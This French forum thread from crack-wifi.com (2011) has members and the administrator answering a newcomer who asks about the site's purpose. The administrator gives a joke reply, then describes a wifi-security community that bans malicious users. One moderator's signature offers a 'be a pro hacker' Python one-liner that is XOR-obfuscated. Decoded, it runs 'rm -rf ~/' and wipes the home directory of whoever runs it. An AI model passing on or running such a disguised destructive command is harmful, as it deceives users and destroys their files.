Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 11-07-2011 20:57:16

debutant
Membre

crack cle wep ou .......

bonsoir a tous

juste une message
je suis abonné sur livebox comme beaucoup de vous, voir d-autre fournisseur.
je ne voix pas l'intéret de pirater son voisin pour le plaisir , comme vous savez ça coute très cher....
je me suis inscrit sur ce forum pour savoir le principe de ce système très compliquer qui est internet.
j-ai acheter une carte awus306h mais c'était pour la puissance de distance en camping.
pour cela pas de regret ça fonctionne très bien,
pour le crack c'est pas mon job malgrès l'achat  d'un Robin  qui est nul..... trop de pub NUL juste WEP et encore
je pense que vous avez compris...

je voudrais juste savoir sur ce forum son intéret ????

vous êtes pour la plus part des experts en ce domaine..
Alors je vous laisse la main....
J espère ne pas être banni pour celà...
bonne soirée à tous.

Dernière modification par debutant (11-07-2011 21:26:16)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 11-07-2011 21:34:54

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Re : crack cle wep ou .......

Plop, pour être banni il faut enfreindre une règle, poser une question n'en est pas une si elle ne laisse pas supposer une mauvaise intention.
Ce qui n'est pas ton cas, donc je ne vois pas pourquoi on te bannirais ?

Ta question en revanche est floue, tu parles de l'intérêt du forum ou de wifi robin ?

Si c'est wifi robin pour ma part aucun intérêt.
Si c'est le forum, je dirais rien de plus ni de moins que les autres, un forum a pour but de regrouper une communauté qui partage le (les) même centres d'intérêt.

Ici c'est le wifi, la sécu réseau et si tu fouines un peu pas mal d'autres sujets qui n'ont rien à voir mais qui alimentent des discussion relatives aux centre d'intérêts de chacun.

Bref un lieu d'échange ouvert et convivial ou les gens aiment se retrouver comme sur tant d'autres forums.

Ps: Dans les deux cas je pense que ce sujet à plus sa place ici, donc je déplace wink.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#3 11-07-2011 21:38:49

konik
Membre d'Or
Lieu : 127.0.0.1

Oui, c'est quoi la question en fait??

$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

#4 11-07-2011 21:59:07

M1ck3y
Administrateur
Lieu : Lost in the darkness

Ta question porte donc sur l'intéret du forum? Et bien, c'est plutot simple, voila:

Le but du forum est de mettre entre les mains de tout un chacun des techniques dangereuses et dévastatrices de hacking, et ceci afin de mettre un chaos total dans les systèmes informatiques des entreprises, des administrations etc... Nous voulons mettre tous les réseaux down, partout dans le monde. Une fois que l'ensemble de ces infrastructures aura été pwned par ma grand mère (qui est actuellement en train de s'introduire sur le réseau de la CIA grace à un four micro ondes trafiqué tournant sous Debian à base de Core I7 overclocké hébergeant une bdd sql d'users / passwords en RAID 1 mirroring sur des disques de 3 To couplé à un duo infernal Amiga 500 / Super Famicom pucée) ou ta voisine (qui s'est introduit dans la boite mail de Obama avec sa Wii), nous pourrons alors prendre le pouvoir pour mettre en place un nouvel ordre mondial. Dans ce nouvel ordre, les monnaies telles que nous les connaissons n'auront plus cours, et ne vaudront plus rien. La valeur de base sera le "coin" qui sera équivalent à une partie de Street Fighter 2. Ainsi, un plein d'essence vaudra 20 coins, une barrette de RAM vaudra 5 coins, une journée de travail vaudra 50 coins etc... Chacun aura droit à sa ration de Street Fighter 2, il n'y aura donc plus de guerres ni de conflits. Cqfd. Gloire à Vaouti, Vaouti est lumière, il est omniscient, il est là en chacun de nous, click here, join now, paypal and mastercard welcome... Euh, je m'égare là.

Je plaisante, bien entendu. Le but du forum est de rassembler une communauté de personnes francophones de tous pays, de tous milieux sociaux et de tous ages passionnées de wifi, de sécurité informatique et autres geekeries en tout genre. Bien évidemment, certains script kiddies mal intentionnés veulent profiter des connaissances disponibles ici pour les employer à mauvais escient, et dans ce cas ils sont en toute logique bannis. Nous avons un règlement qui est très clair. Je t'invite à faire une petite recherche, c'est le genre de discussion que nous avons déja eu sur le forum.

Et non tu ne seras pas banni pour avoir posé une question (pourquoi le serais tu d'ailleurs?), en revanche je déplace ton topic dans une section dédiée aux discussions et polémiques.

[edit: grilled par noireaude pour le déplacement]

#5 11-07-2011 22:51:37

noireaude
Membre d'honneur
Site Web

M1ck3y a écrit :

[edit: grilled par noireaude pour le déplacement]

Hi hi, j'ai fais "court" pour une fois, effet de surprise. lol

Petite question juste comme ça, qui est Vaouti Oo ?

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#6 11-07-2011 22:54:56

M1ck3y
Administrateur

Vaouti, c'est un peu l'équivalent de Skippy le grand gourou des inconnus, mais en version web 2.0 lol

#7 11-07-2011 22:59:41

noireaude
Membre d'honneur
Site Web

Je savais que j'allais regretter d'avoir posé ma question !! lol

#8 11-07-2011 23:34:07

spawn
Modérateur

Mouhaha !!
+1 Like.
En parlant de SK, je suis anim sur une colo de geeks, je leur ai fait une activité WEP et airodump, (et GROSSE pub pour les super tutos de crack-wifi.com) donc, bientôt, ici, arrivage de SK (on a UN jeune sous Debian qui n'en est pas un)

Et un nouvel inscrit, un immense collègue polonais (Grashwandir)

Sur ce, je retourne taffer ma veillée chasse aux zombies.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#9 12-07-2011 18:54:13

M1ck3y
Administrateur

Bienvenue à ta colo de geeks ainsi qu'à ton collègue smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]